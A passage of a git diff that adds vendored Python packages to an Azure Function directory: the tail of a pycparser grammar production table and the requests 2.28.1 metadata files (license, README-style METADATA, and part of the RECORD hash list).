('pointer -> TIMES type_qualifier_list_opt','pointer',2,'p_pointer','c_parser.py',1257), + ('pointer -> TIMES type_qualifier_list_opt pointer','pointer',3,'p_pointer','c_parser.py',1258), + ('type_qualifier_list -> type_qualifier','type_qualifier_list',1,'p_type_qualifier_list','c_parser.py',1287), + ('type_qualifier_list -> type_qualifier_list type_qualifier','type_qualifier_list',2,'p_type_qualifier_list','c_parser.py',1288), + ('parameter_type_list -> parameter_list','parameter_type_list',1,'p_parameter_type_list','c_parser.py',1293), + ('parameter_type_list -> parameter_list COMMA ELLIPSIS','parameter_type_list',3,'p_parameter_type_list','c_parser.py',1294), + ('parameter_list -> parameter_declaration','parameter_list',1,'p_parameter_list','c_parser.py',1302), + ('parameter_list -> parameter_list COMMA parameter_declaration','parameter_list',3,'p_parameter_list','c_parser.py',1303), + ('parameter_declaration -> declaration_specifiers id_declarator','parameter_declaration',2,'p_parameter_declaration_1','c_parser.py',1322), + ('parameter_declaration -> declaration_specifiers typeid_noparen_declarator','parameter_declaration',2,'p_parameter_declaration_1','c_parser.py',1323), + ('parameter_declaration -> declaration_specifiers abstract_declarator_opt','parameter_declaration',2,'p_parameter_declaration_2','c_parser.py',1334), + ('identifier_list -> identifier','identifier_list',1,'p_identifier_list','c_parser.py',1366), + ('identifier_list -> identifier_list COMMA identifier','identifier_list',3,'p_identifier_list','c_parser.py',1367), + ('initializer -> 
assignment_expression','initializer',1,'p_initializer_1','c_parser.py',1376), + ('initializer -> brace_open initializer_list_opt brace_close','initializer',3,'p_initializer_2','c_parser.py',1381), + ('initializer -> brace_open initializer_list COMMA brace_close','initializer',4,'p_initializer_2','c_parser.py',1382), + ('initializer_list -> designation_opt initializer','initializer_list',2,'p_initializer_list','c_parser.py',1390), + ('initializer_list -> initializer_list COMMA designation_opt initializer','initializer_list',4,'p_initializer_list','c_parser.py',1391), + ('designation -> designator_list EQUALS','designation',2,'p_designation','c_parser.py',1402), + ('designator_list -> designator','designator_list',1,'p_designator_list','c_parser.py',1410), + ('designator_list -> designator_list designator','designator_list',2,'p_designator_list','c_parser.py',1411), + ('designator -> LBRACKET constant_expression RBRACKET','designator',3,'p_designator','c_parser.py',1416), + ('designator -> PERIOD identifier','designator',2,'p_designator','c_parser.py',1417), + ('type_name -> specifier_qualifier_list abstract_declarator_opt','type_name',2,'p_type_name','c_parser.py',1422), + ('abstract_declarator -> pointer','abstract_declarator',1,'p_abstract_declarator_1','c_parser.py',1434), + ('abstract_declarator -> pointer direct_abstract_declarator','abstract_declarator',2,'p_abstract_declarator_2','c_parser.py',1442), + ('abstract_declarator -> direct_abstract_declarator','abstract_declarator',1,'p_abstract_declarator_3','c_parser.py',1447), + ('direct_abstract_declarator -> LPAREN abstract_declarator RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_1','c_parser.py',1457), + ('direct_abstract_declarator -> direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_2','c_parser.py',1461), + ('direct_abstract_declarator -> LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_3','c_parser.py',1472), + ('direct_abstract_declarator -> direct_abstract_declarator LBRACKET TIMES RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_4','c_parser.py',1482), + ('direct_abstract_declarator -> LBRACKET TIMES RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_5','c_parser.py',1493), + ('direct_abstract_declarator -> direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',4,'p_direct_abstract_declarator_6','c_parser.py',1502), + ('direct_abstract_declarator -> LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_7','c_parser.py',1512), + ('block_item -> declaration','block_item',1,'p_block_item','c_parser.py',1523), + ('block_item -> statement','block_item',1,'p_block_item','c_parser.py',1524), + ('block_item_list -> block_item','block_item_list',1,'p_block_item_list','c_parser.py',1531), + ('block_item_list -> block_item_list block_item','block_item_list',2,'p_block_item_list','c_parser.py',1532), + ('compound_statement -> brace_open block_item_list_opt brace_close','compound_statement',3,'p_compound_statement_1','c_parser.py',1538), + ('labeled_statement -> ID COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_1','c_parser.py',1544), + ('labeled_statement -> CASE constant_expression COLON pragmacomp_or_statement','labeled_statement',4,'p_labeled_statement_2','c_parser.py',1548), + ('labeled_statement -> 
DEFAULT COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_3','c_parser.py',1552), + ('selection_statement -> IF LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_1','c_parser.py',1556), + ('selection_statement -> IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement','selection_statement',7,'p_selection_statement_2','c_parser.py',1560), + ('selection_statement -> SWITCH LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_3','c_parser.py',1564), + ('iteration_statement -> WHILE LPAREN expression RPAREN pragmacomp_or_statement','iteration_statement',5,'p_iteration_statement_1','c_parser.py',1569), + ('iteration_statement -> DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI','iteration_statement',7,'p_iteration_statement_2','c_parser.py',1573), + ('iteration_statement -> FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',9,'p_iteration_statement_3','c_parser.py',1577), + ('iteration_statement -> FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',8,'p_iteration_statement_4','c_parser.py',1581), + ('jump_statement -> GOTO ID SEMI','jump_statement',3,'p_jump_statement_1','c_parser.py',1586), + ('jump_statement -> BREAK SEMI','jump_statement',2,'p_jump_statement_2','c_parser.py',1590), + ('jump_statement -> CONTINUE SEMI','jump_statement',2,'p_jump_statement_3','c_parser.py',1594), + ('jump_statement -> RETURN expression SEMI','jump_statement',3,'p_jump_statement_4','c_parser.py',1598), + ('jump_statement -> RETURN SEMI','jump_statement',2,'p_jump_statement_4','c_parser.py',1599), + ('expression_statement -> expression_opt SEMI','expression_statement',2,'p_expression_statement','c_parser.py',1604), + ('expression -> assignment_expression','expression',1,'p_expression','c_parser.py',1611), + ('expression -> expression COMMA assignment_expression','expression',3,'p_expression','c_parser.py',1612), + ('assignment_expression -> LPAREN compound_statement RPAREN','assignment_expression',3,'p_parenthesized_compound_expression','c_parser.py',1624), + ('typedef_name -> TYPEID','typedef_name',1,'p_typedef_name','c_parser.py',1628), + ('assignment_expression -> conditional_expression','assignment_expression',1,'p_assignment_expression','c_parser.py',1632), + ('assignment_expression -> unary_expression assignment_operator assignment_expression','assignment_expression',3,'p_assignment_expression','c_parser.py',1633), + ('assignment_operator -> EQUALS','assignment_operator',1,'p_assignment_operator','c_parser.py',1646), + ('assignment_operator -> XOREQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1647), + ('assignment_operator -> TIMESEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1648), + ('assignment_operator -> DIVEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1649), + ('assignment_operator -> MODEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1650), + ('assignment_operator -> PLUSEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1651), + ('assignment_operator -> MINUSEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1652), + ('assignment_operator -> LSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1653), + ('assignment_operator -> 
RSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1654), + ('assignment_operator -> ANDEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1655), + ('assignment_operator -> OREQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1656), + ('constant_expression -> conditional_expression','constant_expression',1,'p_constant_expression','c_parser.py',1661), + ('conditional_expression -> binary_expression','conditional_expression',1,'p_conditional_expression','c_parser.py',1665), + ('conditional_expression -> binary_expression CONDOP expression COLON conditional_expression','conditional_expression',5,'p_conditional_expression','c_parser.py',1666), + ('binary_expression -> cast_expression','binary_expression',1,'p_binary_expression','c_parser.py',1674), + ('binary_expression -> binary_expression TIMES binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1675), + ('binary_expression -> binary_expression DIVIDE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1676), + ('binary_expression -> binary_expression MOD binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1677), + ('binary_expression -> binary_expression PLUS binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1678), + ('binary_expression -> binary_expression MINUS binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1679), + ('binary_expression -> binary_expression RSHIFT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1680), + ('binary_expression -> binary_expression LSHIFT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1681), + ('binary_expression -> binary_expression LT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1682), + ('binary_expression -> binary_expression LE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1683), + ('binary_expression -> binary_expression GE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1684), + ('binary_expression -> binary_expression GT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1685), + ('binary_expression -> binary_expression EQ binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1686), + ('binary_expression -> binary_expression NE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1687), + ('binary_expression -> binary_expression AND binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1688), + ('binary_expression -> binary_expression OR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1689), + ('binary_expression -> binary_expression XOR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1690), + ('binary_expression -> binary_expression LAND binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1691), + ('binary_expression -> binary_expression LOR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1692), + ('cast_expression -> unary_expression','cast_expression',1,'p_cast_expression_1','c_parser.py',1700), + ('cast_expression -> LPAREN type_name RPAREN cast_expression','cast_expression',4,'p_cast_expression_2','c_parser.py',1704), + ('unary_expression -> postfix_expression','unary_expression',1,'p_unary_expression_1','c_parser.py',1708), + ('unary_expression -> PLUSPLUS 
unary_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1712), + ('unary_expression -> MINUSMINUS unary_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1713), + ('unary_expression -> unary_operator cast_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1714), + ('unary_expression -> SIZEOF unary_expression','unary_expression',2,'p_unary_expression_3','c_parser.py',1719), + ('unary_expression -> SIZEOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','c_parser.py',1720), + ('unary_expression -> _ALIGNOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','c_parser.py',1721), + ('unary_operator -> AND','unary_operator',1,'p_unary_operator','c_parser.py',1729), + ('unary_operator -> TIMES','unary_operator',1,'p_unary_operator','c_parser.py',1730), + ('unary_operator -> PLUS','unary_operator',1,'p_unary_operator','c_parser.py',1731), + ('unary_operator -> MINUS','unary_operator',1,'p_unary_operator','c_parser.py',1732), + ('unary_operator -> NOT','unary_operator',1,'p_unary_operator','c_parser.py',1733), + ('unary_operator -> LNOT','unary_operator',1,'p_unary_operator','c_parser.py',1734), + ('postfix_expression -> primary_expression','postfix_expression',1,'p_postfix_expression_1','c_parser.py',1739), + ('postfix_expression -> postfix_expression LBRACKET expression RBRACKET','postfix_expression',4,'p_postfix_expression_2','c_parser.py',1743), + ('postfix_expression -> postfix_expression LPAREN argument_expression_list RPAREN','postfix_expression',4,'p_postfix_expression_3','c_parser.py',1747), + ('postfix_expression -> postfix_expression LPAREN RPAREN','postfix_expression',3,'p_postfix_expression_3','c_parser.py',1748), + ('postfix_expression -> postfix_expression PERIOD ID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1753), + ('postfix_expression -> postfix_expression PERIOD TYPEID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1754), + ('postfix_expression -> postfix_expression ARROW ID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1755), + ('postfix_expression -> postfix_expression ARROW TYPEID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1756), + ('postfix_expression -> postfix_expression PLUSPLUS','postfix_expression',2,'p_postfix_expression_5','c_parser.py',1762), + ('postfix_expression -> postfix_expression MINUSMINUS','postfix_expression',2,'p_postfix_expression_5','c_parser.py',1763), + ('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list brace_close','postfix_expression',6,'p_postfix_expression_6','c_parser.py',1768), + ('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close','postfix_expression',7,'p_postfix_expression_6','c_parser.py',1769), + ('primary_expression -> identifier','primary_expression',1,'p_primary_expression_1','c_parser.py',1774), + ('primary_expression -> constant','primary_expression',1,'p_primary_expression_2','c_parser.py',1778), + ('primary_expression -> unified_string_literal','primary_expression',1,'p_primary_expression_3','c_parser.py',1782), + ('primary_expression -> unified_wstring_literal','primary_expression',1,'p_primary_expression_3','c_parser.py',1783), + ('primary_expression -> LPAREN expression RPAREN','primary_expression',3,'p_primary_expression_4','c_parser.py',1788), + ('primary_expression -> OFFSETOF LPAREN type_name COMMA offsetof_member_designator 
RPAREN','primary_expression',6,'p_primary_expression_5','c_parser.py',1792), + ('offsetof_member_designator -> identifier','offsetof_member_designator',1,'p_offsetof_member_designator','c_parser.py',1800), + ('offsetof_member_designator -> offsetof_member_designator PERIOD identifier','offsetof_member_designator',3,'p_offsetof_member_designator','c_parser.py',1801), + ('offsetof_member_designator -> offsetof_member_designator LBRACKET expression RBRACKET','offsetof_member_designator',4,'p_offsetof_member_designator','c_parser.py',1802), + ('argument_expression_list -> assignment_expression','argument_expression_list',1,'p_argument_expression_list','c_parser.py',1814), + ('argument_expression_list -> argument_expression_list COMMA assignment_expression','argument_expression_list',3,'p_argument_expression_list','c_parser.py',1815), + ('identifier -> ID','identifier',1,'p_identifier','c_parser.py',1824), + ('constant -> INT_CONST_DEC','constant',1,'p_constant_1','c_parser.py',1828), + ('constant -> INT_CONST_OCT','constant',1,'p_constant_1','c_parser.py',1829), + ('constant -> INT_CONST_HEX','constant',1,'p_constant_1','c_parser.py',1830), + ('constant -> INT_CONST_BIN','constant',1,'p_constant_1','c_parser.py',1831), + ('constant -> INT_CONST_CHAR','constant',1,'p_constant_1','c_parser.py',1832), + ('constant -> FLOAT_CONST','constant',1,'p_constant_2','c_parser.py',1851), + ('constant -> HEX_FLOAT_CONST','constant',1,'p_constant_2','c_parser.py',1852), + ('constant -> CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1868), + ('constant -> WCHAR_CONST','constant',1,'p_constant_3','c_parser.py',1869), + ('constant -> U8CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1870), + ('constant -> U16CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1871), + ('constant -> U32CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1872), + ('unified_string_literal -> STRING_LITERAL','unified_string_literal',1,'p_unified_string_literal','c_parser.py',1883), + ('unified_string_literal -> unified_string_literal STRING_LITERAL','unified_string_literal',2,'p_unified_string_literal','c_parser.py',1884), + ('unified_wstring_literal -> WSTRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1894), + ('unified_wstring_literal -> U8STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1895), + ('unified_wstring_literal -> U16STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1896), + ('unified_wstring_literal -> U32STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1897), + ('unified_wstring_literal -> unified_wstring_literal WSTRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1898), + ('unified_wstring_literal -> unified_wstring_literal U8STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1899), + ('unified_wstring_literal -> unified_wstring_literal U16STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1900), + ('unified_wstring_literal -> unified_wstring_literal U32STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1901), + ('brace_open -> LBRACE','brace_open',1,'p_brace_open','c_parser.py',1911), + ('brace_close -> RBRACE','brace_close',1,'p_brace_close','c_parser.py',1917), + ('empty -> ','empty',0,'p_empty','c_parser.py',1923), +] diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE new file mode 100644 index 0000000..b0fcd6d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE @@ -0,0 +1,175 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. 
For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. 
The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA new file mode 100644 index 0000000..3e37cbe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA @@ -0,0 +1,122 @@ +Metadata-Version: 2.1 +Name: requests +Version: 2.28.1 +Summary: Python HTTP for Humans. +Home-page: https://requests.readthedocs.io +Author: Kenneth Reitz +Author-email: me@kennethreitz.org +License: Apache 2.0 +Project-URL: Documentation, https://requests.readthedocs.io +Project-URL: Source, https://github.com/psf/requests +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: Natural Language :: English +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: WWW/HTTP +Classifier: Topic :: Software Development :: Libraries +Requires-Python: >=3.7, <4 +Description-Content-Type: text/markdown +License-File: LICENSE +Requires-Dist: charset-normalizer (<3,>=2) +Requires-Dist: idna (<4,>=2.5) +Requires-Dist: urllib3 (<1.27,>=1.21.1) +Requires-Dist: certifi (>=2017.4.17) +Provides-Extra: security +Provides-Extra: socks +Requires-Dist: PySocks (!=1.5.7,>=1.5.6) ; extra == 'socks' +Provides-Extra: use_chardet_on_py3 +Requires-Dist: chardet (<6,>=3.0.2) ; extra == 'use_chardet_on_py3' + +# Requests + +**Requests** is a simple, yet elegant, HTTP library. + +```python +>>> import requests +>>> r = requests.get('https://httpbin.org/basic-auth/user/pass', auth=('user', 'pass')) +>>> r.status_code +200 +>>> r.headers['content-type'] +'application/json; charset=utf8' +>>> r.encoding +'utf-8' +>>> r.text +'{"authenticated": true, ...' +>>> r.json() +{'authenticated': True, ...} +``` + +Requests allows you to send HTTP/1.1 requests extremely easily. There’s no need to manually add query strings to your URLs, or to form-encode your `PUT` & `POST` data — but nowadays, just use the `json` method! + +Requests is one of the most downloaded Python packages today, pulling in around `30M downloads / week`— according to GitHub, Requests is currently [depended upon](https://github.com/psf/requests/network/dependents?package_id=UGFja2FnZS01NzA4OTExNg%3D%3D) by `1,000,000+` repositories. You may certainly put your trust in this code. 
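The `json` keyword alluded to above removes the form-encoding step entirely: pass any JSON-serializable object and Requests serializes it and sets the `Content-Type` header for you. A minimal sketch, reusing the httpbin.org echo endpoint from the example above:

```python
import requests

# Pass a JSON-serializable object via the `json` keyword; Requests
# serializes it and sets Content-Type: application/json automatically.
payload = {"key1": "value1", "key2": "value2"}
r = requests.post("https://httpbin.org/post", json=payload, timeout=10)

print(r.status_code)     # 200 on success
print(r.json()["json"])  # httpbin echoes the decoded body under the "json" key
```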
+ +[![Downloads](https://pepy.tech/badge/requests/month)](https://pepy.tech/project/requests) +[![Supported Versions](https://img.shields.io/pypi/pyversions/requests.svg)](https://pypi.org/project/requests) +[![Contributors](https://img.shields.io/github/contributors/psf/requests.svg)](https://github.com/psf/requests/graphs/contributors) + +## Installing Requests and Supported Versions + +Requests is available on PyPI: + +```console +$ python -m pip install requests +``` + +Requests officially supports Python 3.7+. + +## Supported Features & Best–Practices + +Requests is ready for the demands of building robust and reliable HTTP–speaking applications, for the needs of today. + +- Keep-Alive & Connection Pooling +- International Domains and URLs +- Sessions with Cookie Persistence +- Browser-style TLS/SSL Verification +- Basic & Digest Authentication +- Familiar `dict`–like Cookies +- Automatic Content Decompression and Decoding +- Multi-part File Uploads +- SOCKS Proxy Support +- Connection Timeouts +- Streaming Downloads +- Automatic honoring of `.netrc` +- Chunked HTTP Requests + +## API Reference and User Guide available on [Read the Docs](https://requests.readthedocs.io) + +[![Read the Docs](https://raw.githubusercontent.com/psf/requests/main/ext/ss.png)](https://requests.readthedocs.io) + +## Cloning the repository + +When cloning the Requests repository, you may need to add the `-c +fetch.fsck.badTimezone=ignore` flag to avoid an error about a bad commit (see +[this issue](https://github.com/psf/requests/issues/2690) for more background): + +```shell +git clone -c fetch.fsck.badTimezone=ignore https://github.com/psf/requests.git +``` + +You can also apply this setting to your global Git config: + +```shell +git config --global fetch.fsck.badTimezone ignore +``` + +--- + +[![Kenneth Reitz](https://raw.githubusercontent.com/psf/requests/main/ext/kr.png)](https://kennethreitz.org) [![Python Software Foundation](https://raw.githubusercontent.com/psf/requests/main/ext/psf.png)](https://www.python.org/psf) + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD new file mode 100644 index 0000000..79ca4fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD @@ -0,0 +1,42 @@ +requests-2.28.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +requests-2.28.1.dist-info/LICENSE,sha256=CeipvOyAZxBGUsFoaFqwkx54aPnIKEtm9a5u2uXxEws,10142 +requests-2.28.1.dist-info/METADATA,sha256=eoNYSJuPWbql7Til9dKPb--KRU2ouGR4g7UxtZFoHNU,4641 +requests-2.28.1.dist-info/RECORD,, +requests-2.28.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +requests-2.28.1.dist-info/top_level.txt,sha256=fMSVmHfb5rbGOo6xv-O_tUX6j-WyixssE-SnwcDRxNQ,9 +requests/__init__.py,sha256=S2K0jnVP6CSrT51SctFyiB0XfI8H9Nt7EqzERAD44gg,4972 +requests/__pycache__/__init__.cpython-39.pyc,, +requests/__pycache__/__version__.cpython-39.pyc,, 